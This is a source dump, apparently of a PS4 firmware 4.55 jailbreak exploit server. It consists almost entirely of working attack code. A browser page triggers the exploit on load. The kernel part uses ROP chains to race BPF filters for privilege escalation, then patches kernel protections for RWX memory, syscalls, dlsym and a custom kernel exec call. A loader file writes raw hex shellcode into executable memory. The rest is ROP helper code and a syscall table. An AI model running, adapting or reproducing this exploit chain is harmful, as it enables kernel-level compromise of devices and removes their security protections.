423 |       // Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
424 |       // E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
425 |       var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
426 |       kchain.push(window.gadgets["pop rax"])
427 |       kchain.push(savectx.add32(0x50));
428 |       kchain.push(window.gadgets["mov rax, [rax]"]);
429 |       kchain.push(window.gadgets["pop rcx"]);
430 |       kchain.push(0x1144E3);
431 |       kchain.push(window.gadgets["add rax, rcx"]);
432 |       kchain.push(window.gadgets["pop rsi"]);
433 |       kchain.push(kexploit_check_patch);
434 |       kchain.push(window.gadgets["mov [rax], rsi"]);
435 | 
436 |       // Patch sys_mmap: Allow RWX (read-write-execute) mapping
437 |       var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
438 |       kchain.push(window.gadgets["pop rax"])
439 |       kchain.push(savectx.add32(0x50));
440 |       kchain.push(window.gadgets["mov rax, [rax]"]);
441 |       kchain.push(window.gadgets["pop rcx"]);
442 |       kchain.push(0x141D14);
443 |       kchain.push(window.gadgets["add rax, rcx"]);
444 |       kchain.push(window.gadgets["pop rsi"]);
445 |       kchain.push(kernel_mmap_patch);
446 |       kchain.push(window.gadgets["mov [rax], rsi"]);
447 | 
448 |       // Patch syscall: syscall instruction allowed anywhere
449 |       var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
450 |       var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
451 |       kchain.push(window.gadgets["pop rax"])
452 |       kchain.push(savectx.add32(0x50));
453 |       kchain.push(window.gadgets["mov rax, [rax]"]);
454 |       kchain.push(window.gadgets["pop rcx"]);
455 |       kchain.push(0x3DC603);
456 |       kchain.push(window.gadgets["add rax, rcx"]);
457 |       kchain.push(window.gadgets["pop rsi"]);
458 |       kchain.push(kernel_syscall_patch1);
459 |       kchain.push(window.gadgets["mov [rax], rsi"]);
460 |       kchain.push(window.gadgets["pop rax"])
461 |       kchain.push(savectx.add32(0x50));
462 |       kchain.push(window.gadgets["mov rax, [rax]"]);
463 |       kchain.push(window.gadgets["pop rcx"]);
464 |       kchain.push(0x3DC621);
465 |       kchain.push(window.gadgets["add rax, rcx"]);
466 |       kchain.push(window.gadgets["pop rsi"]);
467 |       kchain.push(kernel_syscall_patch2);
468 |       kchain.push(window.gadgets["mov [rax], rsi"]);
469 | 
470 |       // Patch sys_dynlib_dlsym: Allow from anywhere
471 |       var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
472 |       var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
473 |       kchain.push(window.gadgets["pop rax"])
474 |       kchain.push(savectx.add32(0x50));
475 |       kchain.push(window.gadgets["mov rax, [rax]"]);
476 |       kchain.push(window.gadgets["pop rcx"]);
477 |       kchain.push(0x3CF6FE);
478 |       kchain.push(window.gadgets["add rax, rcx"]);
479 |       kchain.push(window.gadgets["pop rsi"]);
480 |       kchain.push(kernel_dlsym_patch1);
481 |       kchain.push(window.gadgets["mov [rax], rsi"]);
482 |       kchain.push(window.gadgets["pop rax"])
483 |       kchain.push(savectx.add32(0x50));
484 |       kchain.push(window.gadgets["mov rax, [rax]"]);
485 |       kchain.push(window.gadgets["pop rcx"]);
486 |       kchain.push(0x690C0);
487 |       kchain.push(window.gadgets["add rax, rcx"]);
488 |       kchain.push(window.gadgets["pop rsi"]);
489 |       kchain.push(kernel_dlsym_patch2);
490 |       kchain.push(window.gadgets["mov [rax], rsi"]);
491 | 
492 |       // Add custom sys_exec() call to execute arbitrary code as kernel
493 |       var kernel_exec_param = new int64(0, 1);
494 |       kchain.push(window.gadgets["pop rax"])
495 |       kchain.push(savectx.add32(0x50));
496 |       kchain.push(window.gadgets["mov rax, [rax]"]);
497 |       kchain.push(window.gadgets["pop rcx"]);
498 |       kchain.push(0x102b8a0);
499 |       kchain.push(window.gadgets["add rax, rcx"]);
500 |       kchain.push(window.gadgets["pop rsi"]);
501 |       kchain.push(0x02);
502 |       kchain.push(window.gadgets["mov [rax], rsi"]);
503 |       kchain.push(window.gadgets["pop rsi"])
504 |       kchain.push(0x13a39f); // jmp qword ptr [rsi]
505 |       kchain.push(window.gadgets["pop rdi"])
506 |       kchain.push(savectx.add32(0x50));
507 |       kchain.push(offsetToWebKit(0x119d1f0)); //add rsi, [rdi]; mov rax, rsi
508 |       kchain.push(window.gadgets["pop rax"])
509 |       kchain.push(savectx.add32(0x50));
510 |       kchain.push(window.gadgets["mov rax, [rax]"]);
511 |       kchain.push(window.gadgets["pop rcx"]);
512 |       kchain.push(0x102b8a8);
513 |       kchain.push(window.gadgets["add rax, rcx"]);
514 |       kchain.push(window.gadgets["mov [rax], rsi"]);
515 |       kchain.push(window.gadgets["pop rax"])
516 |       kchain.push(savectx.add32(0x50));
517 |       kchain.push(window.gadgets["mov rax, [rax]"]);
518 |       kchain.push(window.gadgets["pop rcx"]);
519 |       kchain.push(0x102b8c8);
520 |       kchain.push(window.gadgets["add rax, rcx"]);
521 |       kchain.push(window.gadgets["pop rsi"]);
522 |       kchain.push(kernel_exec_param);
523 |       kchain.push(window.gadgets["mov [rax], rsi"]);
524 | 
525 |       // Enable kernel write protection
526 |       kchain.push(window.gadgets["pop rax"])
527 |       kchain.push(savectx.add32(0x50));
528 |       kchain.push(window.gadgets["mov rax, [rax]"]);
529 |       kchain.push(window.gadgets["pop rcx"]);
530 |       kchain.push(0x280f70);
531 |       kchain.push(window.gadgets["add rax, rcx"]);
532 |       kchain.push(window.gadgets["jmp rax"])
533 | 
534 |       // To userland!
535 |       kchain.push(window.gadgets["pop rax"]);
536 |       kchain.push(0);
537 |       kchain.push(window.gadgets["ret"]);
538 |       kchain.push(offsetToWebKit(0x3EBD0));
539 | 
540 |       // Setup valid program
541 |       var bpf_valid_prog          = malloc(0x10);
542 |       var bpf_valid_instructions  = malloc(0x80);
543 | 
544 |       p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
545 |       p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
546 |       p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
547 |       p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
548 |       p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
549 |       p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
550 |       p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
551 |       p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
552 |       p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
553 |       p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);
554 | 
555 |       p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
556 |       p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);
557 | 
558 |       // Setup invalid program
559 |       var entry = window.gadgets["pop rsp"];
560 |       var bpf_invalid_prog          = malloc(0x10);
561 |       var bpf_invalid_instructions  = malloc(0x80);
562 | 
563 |       p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
564 |       p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
565 |       p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
566 |       p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
567 |       p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
568 |       p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
569 |       p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
570 |       p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
571 |       p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
572 |       p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
573 |       p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
574 |       p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
575 |       p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
576 |       p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
577 |       p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
578 |       p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
579 |       p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
580 |       p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);
581 | 
582 |       p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
583 |       p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);
584 | 
585 |       /////////////////// STAGE 3: Racing Filters ///////////////////
586 | 
587 |       // ioctl() with valid BPF program will trigger free() of old program and reallocate memory for the new one
588 |       spawnthread(function (thread2) {
589 |         interrupt1 = thread2.stackBase;
590 |         thread2.push(window.gadgets["ret"]);
591 |         thread2.push(window.gadgets["ret"]);
592 |         thread2.push(window.gadgets["ret"]);
593 |         thread2.push(window.gadgets["pop rdi"]); // pop rdi
594 |         thread2.push(fd1); // what
595 |         thread2.push(window.gadgets["pop rsi"]); // pop rsi
596 |         thread2.push(0x8010427B); // what
597 |         thread2.push(window.gadgets["pop rdx"]); // pop rdx
598 |         thread2.push(bpf_valid_prog); // what
599 |         thread2.push(window.gadgets["pop rsp"]); // pop rsp
600 |         thread2.push(thread2.stackBase.add32(0x800)); // what
601 |         thread2.count = 0x100;
602 |         var cntr = thread2.count;
603 |         thread2.push(window.syscalls[54]); // ioctl
604 |         thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
605 |         thread2.push(window.gadgets["pop rsp"]); // pop rdx
606 |         thread2.push(thread2.stackBase); // what
607 |       });
608 | 
609 |       // ioctl() with invalid BPF program will be sprayed and eventually get used by the thread where the program has already been validated
610 |       spawnthread(function (thread2) {
611 |         interrupt2 = thread2.stackBase;
612 |         thread2.push(window.gadgets["ret"]);
613 |         thread2.push(window.gadgets["ret"]);
614 |         thread2.push(window.gadgets["ret"]);
615 |         thread2.push(window.gadgets["pop rdi"]); // pop rdi
616 |         thread2.push(fd2); // what
617 |         thread2.push(window.gadgets["pop rsi"]); // pop rsi
618 |         thread2.push(0x8010427B); // what
619 |         thread2.push(window.gadgets["pop rdx"]); // pop rdx
620 |         thread2.push(bpf_invalid_prog); // what
621 |         thread2.push(window.gadgets["pop rsp"]); // pop rsp
622 |         thread2.push(thread2.stackBase.add32(0x800)); // what
623 |         thread2.count = 0x100;
624 |         var cntr = thread2.count;
625 |         thread2.push(window.syscalls[54]); // ioctl
626 |         thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
627 |         thread2.push(window.gadgets["pop rsp"]); // pop rdx
628 |         thread2.push(thread2.stackBase); // what
629 |       });
630 | 
631 |       /////////////////// STAGE 3: Trigger ///////////////////
632 |       var scratch = malloc(0x200);
633 |       var test = kernel_rop_run(fd1, scratch);
634 | 
635 |       if(p.syscall("sys_setuid", 0) == 0) {
636 |         allset();
637 |       } else {
638 |         throw "Kernel exploit failed!";
639 |       }
640 |     } else {
641 |       // Everything done already :D
642 |       allset();
643 |     }
644 | 
645 |     // create loader memory
646 |     var code_addr = new int64(0x26100000, 0x00000009);
647 |     var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
648 | 
649 |     // verify loaded
650 |     if (buffer == '926100000') {
651 |       // setup the stuff
652 |       var scePthreadCreate = offsetToLibKernel(0x115c0);
653 |       var thread = malloc(0x08);
654 |       var thr_name = malloc(0x10);
655 |       p.writeString(thr_name, "loader");
656 | 
657 |       // write loader
658 |       writeLoader(p, code_addr);
659 | 
660 |       var createRet = p.fcall(scePthreadCreate, thread, 0, code_addr, 0, thr_name);
661 |     }
662 |   } catch(e) {
663 |     fail("Post Exception: " + e)
664 |   }
665 | }
666 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/loader.js:
--------------------------------------------------------------------------------
  1 | function writeLoader(p, addr) {
  2 | 	p.write4(addr.add32(0x00000000), 0x00000be9);
  3 | 	p.write4(addr.add32(0x00000004), 0x0f2e6600);
  4 | 	p.write4(addr.add32(0x00000008), 0x0000841f);
  5 | 	p.write4(addr.add32(0x0000000C), 0x90000000);
  6 | 	p.write4(addr.add32(0x00000010), 0x54415541);
  7 | 	p.write4(addr.add32(0x00000014), 0x83485355);
  8 | 	p.write4(addr.add32(0x00000018), 0xd23118ec);
  9 | 	p.write4(addr.add32(0x0000001C), 0x000001be);
 10 | 	p.write4(addr.add32(0x00000020), 0x0002bf00);
 11 | 	p.write4(addr.add32(0x00000024), 0x04c60000);
 12 | 	p.write4(addr.add32(0x00000028), 0xb8481024);
 13 | 	p.write4(addr.add32(0x0000002C), 0x2610012f);
 14 | 	p.write4(addr.add32(0x00000030), 0x00000009);
 15 | 	p.write4(addr.add32(0x00000034), 0x012444c6);
 16 | 	p.write4(addr.add32(0x00000038), 0x08bc4902);
 17 | 	p.write4(addr.add32(0x0000003C), 0x09261001);
 18 | 	p.write4(addr.add32(0x00000040), 0xc7000000);
 19 | 	p.write4(addr.add32(0x00000044), 0x00042444);
 20 | 	p.write4(addr.add32(0x00000048), 0x66000000);
 21 | 	p.write4(addr.add32(0x0000004C), 0x022444c7);
 22 | 	p.write4(addr.add32(0x00000050), 0x44c63c23);
 23 | 	p.write4(addr.add32(0x00000054), 0xc6000a24);
 24 | 	p.write4(addr.add32(0x00000058), 0x000b2444);
 25 | 	p.write4(addr.add32(0x0000005C), 0x0c2444c6);
 26 | 	p.write4(addr.add32(0x00000060), 0x2444c600);
 27 | 	p.write4(addr.add32(0x00000064), 0x44c6000d);
 28 | 	p.write4(addr.add32(0x00000068), 0xc6000e24);
 29 | 	p.write4(addr.add32(0x0000006C), 0x000f2444);
 30 | 	p.write4(addr.add32(0x00000070), 0x10bad0ff);
 31 | 	p.write4(addr.add32(0x00000074), 0x48000000);
 32 | 	p.write4(addr.add32(0x00000078), 0x8941e689);
 33 | 	p.write4(addr.add32(0x0000007C), 0x48c789c5);
 34 | 	p.write4(addr.add32(0x00000080), 0x10013cb8);
 35 | 	p.write4(addr.add32(0x00000084), 0x00000926);
 36 | 	p.write4(addr.add32(0x00000088), 0xbed0ff00);
 37 | 	p.write4(addr.add32(0x0000008C), 0x0000000a);
 38 | 	p.write4(addr.add32(0x00000090), 0x48ef8944);
 39 | 	p.write4(addr.add32(0x00000094), 0x100149b8);
 40 | 	p.write4(addr.add32(0x00000098), 0x00000926);
 41 | 	p.write4(addr.add32(0x0000009C), 0x31d0ff00);
 42 | 	p.write4(addr.add32(0x000000A0), 0x44f631d2);
 43 | 	p.write4(addr.add32(0x000000A4), 0xb848ef89);
 44 | 	p.write4(addr.add32(0x000000A8), 0x26100122);
 45 | 	p.write4(addr.add32(0x000000AC), 0x00000009);
 46 | 	p.write4(addr.add32(0x000000B0), 0xc589d0ff);
 47 | 	p.write4(addr.add32(0x000000B4), 0x0000b848);
 48 | 	p.write4(addr.add32(0x000000B8), 0x00092620);
 49 | 	p.write4(addr.add32(0x000000BC), 0x00c60000);
 50 | 	p.write4(addr.add32(0x000000C0), 0xc38948c3);
 51 | 	p.write4(addr.add32(0x000000C4), 0x906607eb);
 52 | 	p.write4(addr.add32(0x000000C8), 0x01489848);
 53 | 	p.write4(addr.add32(0x000000CC), 0x1000bac3);
 54 | 	p.write4(addr.add32(0x000000D0), 0x89480000);
 55 | 	p.write4(addr.add32(0x000000D4), 0x41ef89de);
 56 | 	p.write4(addr.add32(0x000000D8), 0xc085d4ff);
 57 | 	p.write4(addr.add32(0x000000DC), 0x8944ea7f);
 58 | 	p.write4(addr.add32(0x000000E0), 0x15bb48ef);
 59 | 	p.write4(addr.add32(0x000000E4), 0x09261001);
 60 | 	p.write4(addr.add32(0x000000E8), 0xff000000);
 61 | 	p.write4(addr.add32(0x000000EC), 0xffef89d3);
 62 | 	p.write4(addr.add32(0x000000F0), 0x00b848d3);
 63 | 	p.write4(addr.add32(0x000000F4), 0x09262000);
 64 | 	p.write4(addr.add32(0x000000F8), 0xff000000);
 65 | 	p.write4(addr.add32(0x000000FC), 0xc48348d0);
 66 | 	p.write4(addr.add32(0x00000100), 0x415d5b18);
 67 | 	p.write4(addr.add32(0x00000104), 0xc35d415c);
 68 | 	p.write4(addr.add32(0x00000108), 0x03c0c748);
 69 | 	p.write4(addr.add32(0x0000010C), 0x49000000);
 70 | 	p.write4(addr.add32(0x00000110), 0x050fca89);
 71 | 	p.write4(addr.add32(0x00000114), 0xc0c748c3);
 72 | 	p.write4(addr.add32(0x00000118), 0x00000006);
 73 | 	p.write4(addr.add32(0x0000011C), 0x0fca8949);
 74 | 	p.write4(addr.add32(0x00000120), 0xc748c305);
 75 | 	p.write4(addr.add32(0x00000124), 0x00001ec0);
 76 | 	p.write4(addr.add32(0x00000128), 0xca894900);
 77 | 	p.write4(addr.add32(0x0000012C), 0x48c3050f);
 78 | 	p.write4(addr.add32(0x00000130), 0x0061c0c7);
 79 | 	p.write4(addr.add32(0x00000134), 0x89490000);
 80 | 	p.write4(addr.add32(0x00000138), 0xc3050fca);
 81 | 	p.write4(addr.add32(0x0000013C), 0x68c0c748);
 82 | 	p.write4(addr.add32(0x00000140), 0x49000000);
 83 | 	p.write4(addr.add32(0x00000144), 0x050fca89);
 84 | 	p.write4(addr.add32(0x00000148), 0xc0c748c3);
 85 | 	p.write4(addr.add32(0x0000014C), 0x0000006a);
 86 | 	p.write4(addr.add32(0x00000150), 0x0fca8949);
 87 | 	p.write4(addr.add32(0x00000154), 0x0000c305);
 88 | 	p.write4(addr.add32(0x00000158), 0x00000014);
 89 | 	p.write4(addr.add32(0x0000015C), 0x00000000);
 90 | 	p.write4(addr.add32(0x00000160), 0x00527a01);
 91 | 	p.write4(addr.add32(0x00000164), 0x01107801);
 92 | 	p.write4(addr.add32(0x00000168), 0x08070c1b);
 93 | 	p.write4(addr.add32(0x0000016C), 0x00000190);
 94 | 	p.write4(addr.add32(0x00000170), 0x00000034);
 95 | 	p.write4(addr.add32(0x00000174), 0x0000001c);
 96 | 	p.write4(addr.add32(0x00000178), 0xfffffe98);
 97 | 	p.write4(addr.add32(0x0000017C), 0x000000f8);
 98 | 	p.write4(addr.add32(0x00000180), 0x100e4200);
 99 | 	p.write4(addr.add32(0x00000184), 0x0e42028d);
100 | 	p.write4(addr.add32(0x00000188), 0x41038c18);
101 | 	p.write4(addr.add32(0x0000018C), 0x0486200e);
102 | 	p.write4(addr.add32(0x00000190), 0x83280e41);
103 | 	p.write4(addr.add32(0x00000194), 0x400e4405);
104 | 	p.write4(addr.add32(0x00000198), 0x280ee702);
105 | 	p.write4(addr.add32(0x0000019C), 0x41200e41);
106 | 	p.write4(addr.add32(0x000001A0), 0x0e42180e);
107 | 	p.write4(addr.add32(0x000001A4), 0x080e4210);
108 | 	p.write4(addr.add32(0x000001A8), 0x3b031b01);
109 | 	p.write4(addr.add32(0x000001AC), 0xffffffac);
110 | 	p.write4(addr.add32(0x000001B0), 0x00000001);
111 | 	p.write4(addr.add32(0x000001B4), 0xfffffe68);
112 | 	p.write4(addr.add32(0x000001B8), 0xffffffc8);
113 | }
114 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/payloadbin.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 4.55</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | 
 57 | <body onload="runExploit()" style="margin:0;">
 58 |   <div id="loader" class="loader"></div>
 59 | 
 60 |   <div id="allset" class="info" style="display:none;">
 61 |     You're all set!
 62 |   </div>
 63 | 
 64 |   <div id="fail" class="info" style="display:none;">
 65 |     Something went wrong :(
 66 |   </div>
 67 | 
 68 |   <div id="badfw" class="info" style="display:none;">
 69 |     Only firmware 4.55 is supported!
 70 |   </div>
 71 | 
 72 |   <div id="footer" class="credits">
 73 |     <ul style="list-style: none;padding-left:0">
 74 |       <li><a href="#">qwertyoruiopz</a></li>
 75 |       <li><a href="#">flatz</a></li>
 76 |       <li><a href="#">specter</a></li>
 77 |       <li>anonymous contributors</li>
 78 |     </ul>
 79 |   </div>
 80 | 
 81 |   <script>
 82 |     function runExploit() {
 83 |       setTimeout(exploit, 1500);
 84 |     }
 85 | 
 86 |     function allset() {
 87 |       document.getElementById("loader").style.display = "none";
 88 |       document.getElementById("allset").style.display = "block";
 89 |     }
 90 | 
 91 |     function fail(info) {
 92 |       document.getElementById("loader").style.display = "none";
 93 |       document.getElementById("fail").style.display = "block";
 94 | 
 95 |       alert(info)
 96 |     }
 97 |   </script>
 98 | 
 99 |   <script src="rop.js"></script>
100 |   <script src="syscalls.js"></script>
101 |   <script src="loader.js"></script>
102 |   <script src="userland.js"></script>
103 |   <script src="kernel.js"></script>
104 | </body>
105 | </html>
106 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ps4icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/5u770n/ESPS4ExploitServer/f8b3a77f6415f05628a1ac530c01a606a841cb11/PS4Exploit/data/ps4icon.png


--------------------------------------------------------------------------------
/PS4Exploit/data/rop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
 93 |       this.push(gadgets["pop rdi"]); // pop rdi
 94 |       this.push(where); // where
 95 |       this.push(gadgets["pop rsi"]); // pop rsi
 96 |       this.push(what); // what
 97 |       this.push(gadgets["mov [rdi], rsi"]); // perform write
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]); // pop rdi
104 |       this.push(rdi); // what
105 |     }
106 |     if (rsi != undefined) {
107 |       this.push(gadgets["pop rsi"]); // pop rsi
108 |       this.push(rsi); // what
109 |     }
110 |     if (rdx != undefined) {
111 |       this.push(gadgets["pop rdx"]); // pop rdx
112 |       this.push(rdx); // what
113 |     }
114 |     if (rcx != undefined) {
115 |       this.push(gadgets["pop rcx"]); // pop r10
116 |       this.push(rcx); // what
117 |     }
118 |     if (r8 != undefined) {
119 |       this.push(gadgets["pop r8"]); // pop r8
120 |       this.push(r8); // what
121 |     }
122 |     if (r9 != undefined) {
123 |       this.push(gadgets["pop r9"]); // pop r9
124 |       this.push(r9); // what*/
125 |     }
126 | 
127 |     this.push(rip); // jmp
128 |     return this;
129 |   }
130 |   
131 |   this.run = function() {
132 |       var retv = p.loadchain(this, this.notimes);
133 |       this.clear();
134 |       return retv;
135 |   }
136 |   
137 |   return this;
138 | };


--------------------------------------------------------------------------------
/PS4Exploit/data/syscalls.js:
--------------------------------------------------------------------------------
  1 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113,
 81 |   "sys_sendmsg": 114,
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125,
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
